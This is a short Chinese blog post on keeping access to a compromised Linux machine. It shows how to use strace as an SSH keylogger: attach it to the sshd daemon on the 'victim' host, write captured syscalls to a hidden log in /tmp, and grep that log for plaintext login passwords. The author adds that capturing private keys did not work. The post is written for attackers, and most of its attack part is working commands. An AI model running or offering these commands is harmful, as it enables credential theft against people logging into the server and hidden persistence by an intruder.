Linux权限维持-SSH Keylogger strace

strace是什么

strace是一个可用于诊断、调试和教学的Linux用户空间跟踪器。我们用它来监控用户空间进程和内核的交互，比如系统调用、信号传递、进程状态变更等。在后面抓取用户密码的时候，我们会使用这个软件来监控用户的ssh登录操作。

在我们打入了一台Linux机器后,翻文件,用漏洞,等操作都没有任何进展,这个时候可以尝试使用strace进行监听sshd记录登录到这台机子上的私钥和密码。

strace记录sshd明文

‌‌‌如果机器没有,可以安装一个,或者自己上传一个,strace可以记录登录到本机的密码。

yum install strace

‌‌‌在受害机上开启

(strace -f -F -p `ps aux|grep "sshd -D"|grep -v grep|awk {'print $2'}` -t -e trace=read,write -s 32 2> /tmp/.1234.log &)

‌‌‌当我们开启strace后尝试登录并查看密码

grep -E 'read(6, ".+\0\0\0\.+"' /tmp/.1234.log

‌‌‌　　

‌‌‌这里本来还想写一下记录私钥,万万没想到,我找了一下午,试了一下午,我以为是我操作有问题,也问了chatgpt,都没有发现是什么问题,后续问了一位牛子,他跟我讲文章是假的,记录不了私钥,我也是无语。‌‌‌

如果有师傅复现可以记录私钥的话可以带带弟弟。